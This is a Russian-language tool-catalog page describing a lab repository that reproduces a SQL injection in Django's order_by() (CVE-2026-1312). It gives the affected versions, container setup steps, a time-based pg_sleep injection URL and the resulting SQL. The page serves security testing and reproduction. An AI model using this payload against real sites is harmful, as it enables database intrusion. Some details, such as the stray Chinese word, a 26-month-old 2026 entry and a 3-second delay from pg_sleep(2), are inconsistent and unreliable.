Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1312 — Воспроизводит CVE-2026-1312, уязвимость SQL-инъекции в Django, с помощью Docker-окружения и пошагового PoC для тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/sw0rd1ight/cve-2026-1312
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubsw0rd1ight/cve-2026-1312

CVE-2026-1312

Воспроизводит CVE-2026-1312, уязвимость SQL-инъекции в Django, с помощью Docker-окружения и пошагового PoC для тестирования безопасности.

Репозиторий
26 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1312 — это高危уязвимость SQL-инъекции в Django: когда в QuerySet.order_by() используется псевдоним столбца, содержащий точку, в сочетании с FilteredRelation, разворачиваемым через словарь при динамическом построении запроса, атакующий может внедрить вредоносный SQL.

Затронутые версии:

  • Ветка Django 6.0 — версии до 6.0.2
  • Ветка Django 5.2 — версии до 5.2.11
  • Ветка Django 4.2 — версии до 4.2.28

Запуск окружения

Этот проект уязвимости собирается с помощью devcontainer в VS Code.

1️⃣ Откройте проект Откройте корень существующего проекта (содержащий папку .devcontainer) в VS Code.

2️⃣ Переоткройте в контейнере (сборка Dev Container)

Нажмите Ctrl+Shift+P (Windows/Linux) или Cmd+Shift+P (Mac)

Введите Remote-Containers: Reopen in Container

VS Code прочитает конфигурацию .devcontainer и соберёт контейнер (первая сборка может занять несколько минут)

⚠️ Если Dockerfile или зависимости обновлялись, выберите Remote-Containers: Rebuild Container, чтобы гарантированно использовать актуальное окружение.

3️⃣ Запустите сервер разработки Django

Откройте палитру команд Ctrl+Shift+P

Введите Tasks: Run Task

Выберите django:start (задача уже настроена в .vscode/tasks.json)

Эта задача запустит сервер разработки Django внутри контейнера

По умолчанию он слушает 0.0.0.0:8086

4️⃣ Откройте проект в браузере

Откройте браузер и перейдите по адресу:

http://localhost:8086

5️⃣ Примечания

При первом запуске:

Возможно, потребуется выполнить миграции базы данных:

root@kitploit:~
python manage.py migrate

Воспроизведение уязвимости

Обратитесь к интерфейсу /book/search, http://localhost:8086/book/search?name=vuln_book.id,pg_sleep(2)

Вы увидите, что задержка в 3 секунды успешно срабатывает

В этот момент SQL, скомпилированный нижним уровнем ORM Django, выглядит так:

root@kitploit:~
SELECT "vuln_book"."id", "vuln_book"."title", "vuln_book"."author_id" FROM "vuln_book" ORDER BY ("vuln_book".id,pg_sleep(2)) ASC
Скачать инструмент